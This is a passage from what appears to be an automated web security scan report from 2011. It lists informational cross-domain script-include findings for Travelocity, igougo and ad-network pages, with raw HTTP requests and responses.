csi15=2748761.js^1^1317599431^1317599431&3188004.js^1^1317599406^1317599406&3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688; ses15=13378^2&13209^2&12566^1&12359^1; ses1=13209^3; csi1=3226929.js^1^1317599456^1317599456&3226251.js^2^1317599333^1317599350; ses8=13209^1; csi8=3226247.js^1^1317599462^1317599462

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:58:02 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7845/12566; expires=Mon, 03-Oct-2011 00:58:02 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 03-Oct-2011 00:58:02 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13378^2&13209^2&12566^3&12359^1; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=28917; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3188004.js^2^1317599406^1317599882&2748761.js^1^1317599431^1317599431&3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688; expires=Sun, 09-Oct-2011 23:58:02 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 1975

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...
<body>

<script language="JavaScript" src="http://a.collective-media.net/adj/cm.guardian/;sz=300x250;ord=$random$?" type="text/javascript"></script>
...[SNIP]...

20.32. http://r1-ads.ace.advertising.com/site=812162/size=160600/u=2/bnum=34930016/hr=19/hl=4/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelDetail.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253Ftab%253Dguide%2526tripType%253Dhotel%2526propertyId%253D4810%2526airport%253DBOS%2526resetReview%253Dtrue%2526hotelQKey%253D-2237575859332798600%2526tsHotelQKey%253D-2237575859332798600%2526reviewPage%253DreviewStart%2526locLink%253DHOTEL.HOTELAVAILABILITYLISTLITE1%257CNAT1%2526dr%253D4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=812162/size=160600/u=2/bnum=34930016/hr=19/hl=4/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelDetail.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253Ftab%253Dguide%2526tripType%253Dhotel%2526propertyId%253D4810%2526airport%253DBOS%2526resetReview%253Dtrue%2526hotelQKey%253D-2237575859332798600%2526tsHotelQKey%253D-2237575859332798600%2526reviewPage%253DreviewStart%2526locLink%253DHOTEL.HOTELAVAILABILITYLISTLITE1%257CNAT1%2526dr%253D4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /site=812162/size=160600/u=2/bnum=34930016/hr=19/hl=4/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelDetail.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253Ftab%253Dguide%2526tripType%253Dhotel%2526propertyId%253D4810%2526airport%253DBOS%2526resetReview%253Dtrue%2526hotelQKey%253D-2237575859332798600%2526tsHotelQKey%253D-2237575859332798600%2526reviewPage%253DreviewStart%2526locLink%253DHOTEL.HOTELAVAILABILITYLISTLITE1%257CNAT1%2526dr%253D4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&random=656365&tile=564238840132219&section=details
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1072156.812162.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:12:16 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 603
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 00:12:15 GMT
Connection: close
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Sun, 03-Oct-2021 00:12:16 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4359.advertising.comOX2601/B5797640.2;sz=160x600;click=http://r1-ads.ace.advertising.com/click/site=0000812162/mnum=0001072156/cstr=34930016=_4e88fde0,0213706401,812162^1072156^1184^0,1_/xsxdata=$XSXDATA/bnum=34930016/optn=64?trg=;ord=0213706401?">');document.write('<\/SCRIPT>
...[SNIP]...

20.33. http://r1-ads.ace.advertising.com/site=812162/size=160600/u=2/bnum=78334226/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=812162/size=160600/u=2/bnum=78334226/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /site=812162/size=160600/u=2/bnum=78334226/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1072156.812162.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:09:08 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 603
Date: Mon, 03 Oct 2011 00:09:07 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Sun, 03-Oct-2021 00:09:08 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4359.advertising.comOX2601/B5797640.2;sz=160x600;click=http://r1-ads.ace.advertising.com/click/site=0000812162/mnum=0001072156/cstr=78334226=_4e88fd23,1577287805,812162^1072156^1184^0,1_/xsxdata=$XSXDATA/bnum=78334226/optn=64?trg=;ord=1577287805?">');document.write('<\/SCRIPT>
...[SNIP]...

20.34. http://r1-ads.ace.advertising.com/site=812164/size=728090/u=2/bnum=23819479/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=812164/size=728090/u=2/bnum=23819479/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /site=812164/size=728090/u=2/bnum=23819479/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=529164&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.915323.812164.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:09:08 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 595
Date: Mon, 03 Oct 2011 00:09:08 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Sun, 03-Oct-2021 00:09:08 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3285.advertisingcom/B2343920.49;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000812164/mnum=0000915323/cstr=23819479=_4e88fd24,7015322258,812164^915323^1184^0,1_/xsxdata=$xsxdata/bnum=23819479/optn=64?trg=;ord=7015322258?">');document.write('<\/SCRIPT>
...[SNIP]...

20.35. http://seg.sharethis.com/getSegment.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seg.sharethis.com
Path:   /getSegment.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /getSegment.php?purl=http%3A%2F%2Fwww.igougo.com%2Ftraveldeals%2Fratefinder.aspx%3FTypeID%3D1%26SourceID%3DTVLY-dRF-Popunder%26adlt%3D1%26end%3DBoston%26rm%3D1%26dest%3DBoston%2C%2520undefined%2520undefined%26strtDate%3D10%2F04%2F2011%26endDate%3D10%2F07%2F2011&jsref=http%3A%2F%2Fwww.travelocity.com%2FpopWindow2%3FtheDomain%3Dwww.travelocity.com%26selectedForm%3Dcb-form-ho%26formPrefix%3DHO%26fromDate%3Ddd%26fromMonth%3Dmm%26fromYear%3Dyyyy%26toDate%3Ddd%26toMonth%3Dmm%26toYear%3Dyyyy%26theAdtoShow%3Dad2%26dest%3DBOS%26triptype%3D%26noOfRooms%3D1%26noOfAdults%3D1%26service%3DTRAVELOCITY%26oneway%3D&rnd=1317601643778 HTTP/1.1
Host: seg.sharethis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CqCKBE5ezzUzVT7FCnHuAg==

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Mon, 03 Oct 2011 00:27:28 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 6174


           <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
           <html>
           <head>
           <meta http-equiv="Content-type" content="text/html;charset=UTF-8">
           
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...

20.36. http://static.igougo.com/scripts/all_53403.ashx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.igougo.com
Path:   /scripts/all_53403.ashx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /scripts/all_53403.ashx?Lo0P=d10051c1dcf48dfca1203fd21cf4182153459 HTTP/1.1
Host: static.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=455|Accelerated|915|12|0; SL_NV12=1|12

Response

HTTP/1.1 200 OK
Server: SLRS
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Tue, 27 Sep 2011 02:07:25 GMT
X-Strangeloop: RCache
Content-Length: 53459
X-SL-RCache: Cached
Cache-Control: public, max-age=31235580
Expires: Fri, 28 Sep 2012 12:59:58 GMT
Date: Mon, 03 Oct 2011 00:26:58 GMT
Connection: close
Vary: Accept-Encoding

SearchAssistant=Class.create({options:$H({className:"suggest",minimumCharacters:3,timeout:10000,delay:40,displayNoResults:!0,noResultsMessage:"No Suggestion",cache:!0,templateField:null,maxItems:10,on
...[SNIP]...
</script>');try{Prototype.Browser.WebKit&&typeof Effect=="undefined"&&document.write('<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8/effects.js"></script>
...[SNIP]...

20.37. http://static.igougo.com/traveldeals/iAuto.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.igougo.com
Path:   /traveldeals/iAuto.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /traveldeals/iAuto.aspx HTTP/1.1
Host: static.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=455|Accelerated|915|12|0; SL_NV12=1|12; __utmx=179047228.; __utmxx=179047228.; __unam=3de0670-132c72d397d-d7082d6-1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=utf-8
X-Strangeloop: ViewState,Compression
Expires: Mon, 03 Oct 2011 00:27:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 00:27:06 GMT
Content-Length: 680
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" ><head><script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

20.38. http://travel.travelocity.com/hotel/HotelAvailability.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://travel.travelocity.com
Path:   /hotel/HotelAvailability.do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617 HTTP/1.1
Host: travel.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelDetail.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?tab=guide&tripType=hotel&propertyId=4810&airport=BOS&resetReview=true&hotelQKey=-2237575859332798600&tsHotelQKey=-2237575859332798600&reviewPage=reviewStart&locLink=HOTEL.HOTELAVAILABILITYLISTLITE1|NAT1&dr=4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=session#1317600481056-80236#1317602524|PC#1317600481056-80236.19#1318810264|check#true#1317600724; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.2.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:13:47 GMT
Server: Apache
Set-Cookie: JSID=C3B4C0033B2F65D5EA7EF7750A5F38F6.p0742; Domain=.travelocity.com; Path=/
Set-Cookie: Service=TRAVELOCITY; Domain=.travelocity.com; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 90909

<!--
JSESSIONID = C3B4C0033B2F65D5EA7EF7750A5F38F6.p0742
TPSESSIONID = null
Service = TRAVELOCITY
TYRG1ST = 51B82D43BB8E25C5
--><script type="text/javascript">var jsessionid="C3B4C0033B2F65D5EA7EF77
...[SNIP]...
<link rel="stylesheet" type="text/css" media="screen,all" href="http://i.travelpn.com.edgesuite.net/11.10/css/HF_hotels_overrides.css"/>
<script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/11.10/js/navigation.js"></script>
<script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/11.10/js/global.js"></script>
<script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/11.10/js/hotels.js"></script>
...[SNIP]...
<link type="text/css" href="http://i.travelpn.com.edgesuite.net/11.10/css/calendar_datepicker.css" rel="stylesheet" />
<script language="javascript" type="text/javascript" src="http://i.travelpn.com.edgesuite.net/jquery/jquery.min.js"></script>
<script language="javascript" type="text/javascript" src="http://i.travelpn.com.edgesuite.net/jquery/ui/jquery.ui.core.js"></script>
<script language="javascript" type="text/javascript" src="http://i.travelpn.com.edgesuite.net/11.10/js/calendar_datepicker.js"></script>
...[SNIP]...
<body id="hot" onload="javascript:on_load();" >
<script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/11.10/js/mbox.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/11.10/js/tracking_tags_US.js"></script>
...[SNIP]...

20.39. http://travel.travelocity.com/hotel/HotelCobrand.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://travel.travelocity.com
Path:   /hotel/HotelCobrand.do

Issue detail

The response dynamically includes the following script from another domain:

Request

POST /hotel/HotelCobrand.do HTTP/1.1
Host: travel.travelocity.com
Proxy-Connection: keep-alive
Content-Length: 735
Cache-Control: max-age=0
Origin: http://www.travelocity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083; IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.2.9.1317600523363; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Service=TRAVELOCITY&SEQ=60048504&searchMode=city&expr_path=Y&dateFormat=mm%2Fdd%2Fyyyy&opaqueTabSelected=0&cityCountryCode=US&city=bos&state=&TS_HO_destlist=Las+Vegas%7CNV%7CUS&leavingDate=mm%2Fdd%2Fy
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:46 GMT
Server: Apache
Set-Cookie: JSID=AE7752E570B0CD85432B0A6ABF76028D.p0856; Domain=.travelocity.com; Path=/
Set-Cookie: Service=TRAVELOCITY; Domain=.travelocity.com; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 3616

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!--
JSESSIONID = AE7752E570B0CD85432B0A6ABF76028D.p0856
TPSESSIONID = null
Service = TRAVELOCITY
TYRG1ST = 51B82D43BB8E25C5
--><script
...[SNIP]...
</noscript>

<script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/11.10/js/swfobject.js"></script>
...[SNIP]...

20.40. http://travel.travelocity.com/hotel/HotelDetail.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://travel.travelocity.com
Path:   /hotel/HotelDetail.do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /hotel/HotelDetail.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?tab=guide&tripType=hotel&propertyId=4810&airport=BOS&resetReview=true&hotelQKey=-2237575859332798600&tsHotelQKey=-2237575859332798600&reviewPage=reviewStart&locLink=HOTEL.HOTELAVAILABILITYLISTLITE1|NAT1&dr=4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149 HTTP/1.1
Host: travel.travelocity.com
Proxy-Connection: keep-alive
